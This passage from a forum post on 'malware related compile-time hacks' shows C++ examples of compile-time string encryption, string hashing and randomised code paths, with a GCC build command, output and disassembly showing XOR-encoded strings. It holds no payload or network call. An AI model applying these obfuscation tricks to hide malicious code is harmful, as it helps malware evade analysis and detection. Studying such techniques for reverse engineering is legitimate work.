printf("exampleRandom1: Code path 3!\n"); break; } case 4: { printf("exampleRandom1: Code path 4!\n"); break; } default: { printf("Fucking poltergeist!\n"); } } } // A small random code generator example void exampleRandom2() { volatile uint32_t RndVal = vxRANDOM(0, 100); if(vxRAND() % 2) { RndVal += vxRANDOM(0, 100); } else { RndVal -= vxRANDOM(0, 200); } printf("exampleRandom2: %d\n", RndVal); } // A small string hasing example void exampleHashing() { printf("exampleHashing: 0x%08X\n", vxHASH("hello world!")); printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!")); } void exampleEncryption() { printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!")); } extern "C" void Main() { exampleRandom1(); exampleRandom2(); exampleHashing(); exampleEncryption(); } To build code with GCC/MinGW I used this command: g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt Compiled binary returs this, as expected: exampleRandom1: Code path 2! exampleRandom2: 145 exampleHashing: 0x2D13947A exampleHashing: 0x2D13947A exampleEncryption: Hello world! Decompiled code, that was generated by compiler: exampleRandom1 proc near var_18= dword ptr -18h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!" call puts leave retn exampleRandom1 endp exampleRandom2 proc near var_28= dword ptr -28h var_24= dword ptr -24h var_C= dword ptr -0Ch push ebp mov ebp, esp sub esp, 28h mov [ebp+var_C], 78 mov eax, [ebp+var_C] mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n" add eax, 67 mov [ebp+var_C], eax mov eax, [ebp+var_C] mov [esp+28h+var_24], eax call printf leave retn exampleRandom2 endp exampleHashing proc near var_18= dword ptr -18h var_14= dword ptr -14h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf leave retn exampleHashing endp exampleEncryption proc near var_28= dword ptr -28h var_24= dword ptr -24h var_15= byte ptr -15h var_14= byte ptr -14h var_13= byte ptr -13h var_12= byte ptr -12h var_11= byte ptr -11h var_10= byte ptr -10h var_F= byte ptr -0Fh var_E= byte ptr -0Eh var_D= byte ptr -0Dh var_C= byte ptr -0Ch var_B= byte ptr -0Bh var_A= byte ptr -0Ah var_9= byte ptr -9 push ebp xor eax, eax mov ebp, esp mov ecx, 0Dh push edi lea edi, [ebp+var_15] sub esp, 24h rep stosb xor eax, eax mov [ebp+var_15], 4Ah mov [ebp+var_14], 66h mov [ebp+var_13], 68h mov [ebp+var_12], 69h mov [ebp+var_11], 69h mov [ebp+var_10], 27h mov [ebp+var_F], 7Fh mov [ebp+var_E], 66h mov [ebp+var_D], 78h mov [ebp+var_C], 67h mov [ebp+var_B], 68h mov [ebp+var_A], 2Ch loc_401045: lea ecx, [eax+2] xor [ebp+eax+var_15], cl inc eax cmp eax, 0Ch lea edx, [ebp+var_15] jnz short loc_401045 mov [esp+28h+var_24], edx mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n" mov [ebp+var_9], 0 call printf add esp, 24h pop edi pop ebp retn exampleEncryption endp [h=4]Attached Files[/h] main.rar 650bytes 68 downloads Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums